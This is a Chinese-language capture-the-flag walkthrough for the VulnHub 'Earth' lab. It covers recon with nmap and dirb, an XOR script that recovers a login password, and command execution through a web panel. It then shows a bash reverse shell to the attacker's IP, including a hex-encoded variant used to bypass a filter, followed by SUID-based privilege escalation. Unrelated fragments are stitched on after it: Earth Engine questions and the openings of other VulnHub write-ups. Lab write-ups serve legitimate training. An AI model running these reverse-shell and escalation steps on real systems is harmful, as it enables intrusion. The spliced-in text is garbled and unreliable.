Earth靶机下载:https://www.vulnhub.com/entry/the-planets-earth,755/
攻击机:KALI
信息搜集
在KALI中使用ARP-SCAN确认靶机IP
arp-scan -l

使用NMAP扫描端口,发现443端口有DNS解析
nmap -A -p 1-65535 192.168.122.135

将DNS加入/etc/hosts

访问earth.local,发现一些信息

扫描目录
dirb http://earth.local/


打开后发现是登陆界面
再次扫描
dirb https://earth.local/


发现存在robots.txt,打开后看到/testingnotes.*
猜测尝试后发现为txt文件并打开


根据提示访问testdata.txt文件

漏洞攻击
编写XOR脚本,将earth.local的信息与testdata.txt进行异或运算
import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))

运算后得到
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
将输出的16进制转换为字符

发现转换后的内容是循环的,得出字符串earthclimatechangebad4humans
根据之前英文提示使用terra/earthclimatechangebad4humans尝试登录

登录成功并发现输入框可执行系统指令

使用find命令查找flag
find / -name "*flag*"

查找后打开/var/earth_web/usr_flag.txt得到第一个flag

接下来使用反弹shell连接到靶机
bash -i >& /dev/tcp/192.168.122.131/8888 0>&1
执行后无反应
将IP进行16进制转换后成功执行
bash -i >& /dev/tcp/0xc0.0xa8.0x7a.0x83/8888 0>&1


提权
查找有权限的命令
find / -perm -u=s -type f 2>/dev/null

发现有个/usr/bin/reset_root
尝试运行

发现报错
nc -nlvp 8888 >reset_root
nc 192.168.122.131 8888 < /usr/bin/reset_root


使用strace打开
strace /root/reset_root

发现权限不够,使用chmod


靶机再尝试运行reset_root


成功提权到root
查找flag后打开


我需要为我的论文下载一堆Landsat图像。我的问题看起来很简单,但我对JavaScript一无所知,文档也没有提供足够的帮助。我已将集合过滤到我的区域和时间段,我想将所有图像分别导出到云端硬盘。集合示例:varsurfaceReflectanceL5=ee.ImageCollection('LANDSAT/LT5_SR');vardateSR5=surfaceReflectanceL5.filterDate('1984-01-01','1985-01-01');varprSR5=dateSR5.filter(ee.Filter.eq('wrs_path',182)).filter(e
GainPower识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Gainpower]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtMACAddressCountLenM
我目前正在使用MATLAB/Simulink和GoogleEarth进行飞行模拟项目。我想做的是让MATLAB/Simulink进行所有计算和模拟,并让GoogleEarth实时显示结果。为了连接这两个程序,我使用COM接口(interface),而MATLAB/Simulink作为COM客户端,InternetExplorer作为COM服务器。在此之前,我一直在使用GoogleEarthCOMAPI而不是GoogleEarthAPI(javascript之一)。但是,某些功能在COMAPI中不可用或受限(例如:俯仰、滚动)。因此,我求助于Google地球插件。这是示例,Web应用程序
本文的主要目的是如何快速实现区域的一个网格的建立,主要过程是获取影像的经纬度,然后分别获取经纬度乘以一个数然后转化为整型,并将长宽相乘转化为一个矢量,然后对每一个歌王进行边界的坐标的获取与,最后返回一个多边形geometry,最后还要建立一个可以画图的工具 Map.drawingTools(),将设定好的工具进行遍历,然后添加图层,最后形成一个展示。主要的函数有一下内容:ee.Image.pixelLonLat()创建一个有两个带子的图像,名为"经度"和"纬度",包含每个像素的经度和纬度,单位是度。没有参数。返回。图像这个函数的主要目的就是获取影像的经纬度信息然后返回值中包含精度和纬度波段。M
GearofWar识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Gearofwar]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtMACAddressCountLenMACVen
NO.1VulnHub靶机-Jangow:1.0.1迟到的文章,就当库存发出来吧~byAnQtroops2022.9.100x00靶机信息1、下载地址:https://www.vulnhub.com/entry/jangow-101,754/2、难度:简单3、上架时间:2021年11月4日4、提示信息:Thesecrettothisboxisenumeration!Inquiriesjangow2021@gmail.com5、实验环境攻击机VMware、靶机ViralBox攻击机和靶机必须保证网络连通性!0x01信息收集靶机IP探测1、我们打开靶机之后能看到靶机的IP地址2、我们也可以用kal
有没有一种更简单的方法可以将Google地球引擎(javascript)应用程序嵌入到网页中,而无需遵循GoogleEEdemoapps提供的折磨路线??EarthEngineCode环境使得开发核心GEE应用程序变得快速而快速。但是,将GEE应用程序嵌入网页所花费的时间是编写GEE应用程序所花费时间的10倍。所有演示应用程序似乎都需要(a)使用GoogleAppEngine,(b)用Python重新编码GEE应用程序,(c)使用jinja2模板引擎将python代码链接到网页,以及(d)仍然有一些挥之不去的javascript。例如,在TrendyLightsdemo,服务器端脚本程
Landsat7¶Landsat7 collection.SurfaceReflectance¶USGSLandsat7SurfaceReflectanceTier1USGSLandsat7SurfaceReflectanceTier2TopofAtmosphere(TOA)¶USGSLandsat7Collection1Tier1TOAReflectanceUSGSLandsat7Collection1Tier1andReal-TimedataTOAReflectanceUSGSLandsat7Collection1Tier2TOAReflectanceRawImages¶USGSLands
地球引擎代码编辑器code.earthengine.google.com上的地球引擎(EE)代码编辑器 是用于地球引擎JavaScriptAPI的基于网络的IDE。代码编辑器功能旨在快速轻松地开发复杂的地理空间工作流程。代码编辑器具有以下元素(如图1所示):JavaScript代码编辑器用于可视化地理空间数据集的地图显示API参考文档(文档选项卡)基于Git的脚本管理器(脚本选项卡)控制台输出(控制台选项卡)任务管理器(任务选项卡)处理长时间运行的查询交互式地图查询(检查器选项卡)搜索数据存档或保存的脚本几何绘图工具 地球引擎代码编辑器的组件图代码编辑器具有多种功能,可帮助您利用EarthEn
GreenOptics识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/GreenOptic]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts3CapturedARPReq/Reppackets,from3hosts.Totalsize:180_____________________________________________________________________________IPAtMACAddressCountLenMAC